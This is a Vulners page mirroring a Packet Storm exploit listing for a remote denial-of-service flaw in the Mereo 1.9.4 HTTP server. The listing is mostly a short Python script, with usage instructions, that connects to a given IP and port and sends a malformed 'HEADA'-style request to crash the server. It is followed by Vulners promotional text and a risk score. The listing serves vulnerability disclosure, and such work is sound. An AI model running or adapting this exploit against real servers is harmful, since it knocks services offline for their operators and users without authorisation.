Vulners
Lucene search
Mereo 1.9.4 Denial Of Service
🗓️ 22 Jun 2020 00:00:00Reported by Saeed reza ZamanianType 
packetstorm🔗 packetstormsecurity.com👁 314 Views
`#!/usr/bin/python
'''
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Date: 06-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/mereo/
# Software Link: https://sourceforge.net/projects/mereo/files/
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is
not supported with the application, so it will be caused to crash.
Usage:
python mereo194_dos.py 1.2.3.4 80
'''
import socket
import os
import sys
if len(sys.argv) != 3:
print "Usage: python mereo194_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")
expl.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jun 2020 00:00Current
7.4High risk
Vulners AI Score7.4